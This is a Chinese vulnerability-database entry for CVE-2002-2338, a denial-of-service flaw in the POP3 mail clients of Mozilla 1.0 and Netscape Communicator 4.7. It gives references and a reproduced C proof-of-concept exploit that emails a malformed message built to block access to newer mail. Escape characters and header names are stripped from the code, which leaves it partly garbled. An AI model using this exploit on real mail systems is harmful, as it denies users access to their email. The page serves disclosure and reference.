Netscape / Mozilla畸形邮件POP3拒绝服务漏洞

Netscape / Mozilla畸形邮件POP3拒绝服务漏洞

漏洞ID 1106782 漏洞类型 输入验证
发布时间 2002-06-12 更新时间 2002-12-31
图片[1]-Netscape / Mozilla畸形邮件POP3拒绝服务漏洞-安全小百科CVE编号 CVE-2002-2338
图片[2]-Netscape / Mozilla畸形邮件POP3拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200212-382
漏洞平台 Multiple CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21539
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-382
|漏洞详情
Mozilla1.0及其更早版本,和NetscapeCommunicator4.7及其更早版本的POP3邮件客户端存在漏洞。远程攻击者可以借助换行符中也可以看做是信息结尾,包含一个.(点)的邮件信息导致服务拒绝(无新邮件)。
|漏洞EXP
source: http://www.securityfocus.com/bid/5002/info

The Netscape Communicator and Mozilla browsers include support for email, and the ability to fetch mail through a POP3 server. Both products are available for a range of platforms, including Microsoft Windows and Linux.

Under some circumstances, malformed email messages may prevent Netscape and Mozilla clients from accessing POP3 mailboxes. In particular, users will be unable to access more recent messages or delete the malicious email. 

/* this is the code that comes with my
 * advisory #1 to illustrate this...
 * eldre8 at afturgurluk (double dot minus one) org
 */

#include
#include
#include
#include
#include
#include
#include
#include

#define MX "localhost"
#define EHLO "EHLO mxrn"
#define MAIL "MAIL FROM: root@localhostrn"
#define RCPT "RCPT TO: root@localhostrn"
#define DATA "DATArn"
#define QUIT "QUITrn"

#define PORT 25

int sock;
char buffer[255];

void SigCatch() {
    fprintf(stderr, "bbbye!n");
    close(sock);
    exit(0);
}

int main() {
    /* I was too lame to implement the command line... :) */
    int i;
    struct sockaddr_in sout;
    struct hostent *hp;

    signal(SIGINT, SigCatch);

    hp=gethostbyname(MX);
    sock=socket(AF_INET, SOCK_STREAM, 0);
    if (sock<0) {
        perror("sock");
        return -1;
    }

    sout.sin_family=AF_INET;
    sout.sin_port=htons(PORT);
    memcpy(&(sout.sin_addr), *(hp->h_addr_list), sizeof(struct in_addr));
    if (connect(sock, &sout, sizeof(sout))<0) {
        perror("connect");
        return -1;
    }
    recv(sock, buffer, 255, 0); /* receive the banner... */
    send(sock, EHLO, sizeof(EHLO), 0);
    recv(sock, buffer, 255, 0); /* receive the welcome message... */
    send(sock, MAIL, sizeof(MAIL), 0);
    recv(sock, buffer, 255, 0); /* receive the acknowledgement to mail from. */
    send(sock, RCPT, sizeof(RCPT), 0);
    recv(sock, buffer, 255, 0); /* idem, but for the rcpt to... */
    send(sock, DATA, sizeof(DATA), 0);
    recv(sock, buffer, 255, 0);
    i=sprintf(buffer, "b4d maIl 1n 4KT1oN!nx0ax0dx2ex0dx20x0ax0anblabla...x0ax20");
    *(buffer+i)="x0";
    sprintf(buffer+i+1, "n.n");
    send(sock, buffer, i+1+3, 0); /* send the dumb thing ... */
    recv(sock, buffer, 255, 0);
    send(sock, QUIT, sizeof(QUIT), 0);
    recv(sock, buffer, 255, 0);
    close(sock);

    return 0;
}
|参考资料

来源:BID
名称:5002
链接:http://www.securityfocus.com/bid/5002
来源:XF
名称:mozilla-netscape-pop3-dos(9343)
链接:http://www.iss.net/security_center/static/9343.php
来源:mozilla.org
链接:http://mozilla.org/releases/mozilla1.0.1/security-fixes-1.0.1.html
来源:bugzilla.mozilla.org
链接:http://bugzilla.mozilla.org/show_bug.cgi?id=144228

相关推荐: Hosting Controller Hidden Field Password Changing Vulnerability

Hosting Controller Hidden Field Password Changing Vulnerability 漏洞ID 1101804 漏洞类型 Design Error 发布时间 2002-07-13 更新时间 2002-07-13 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享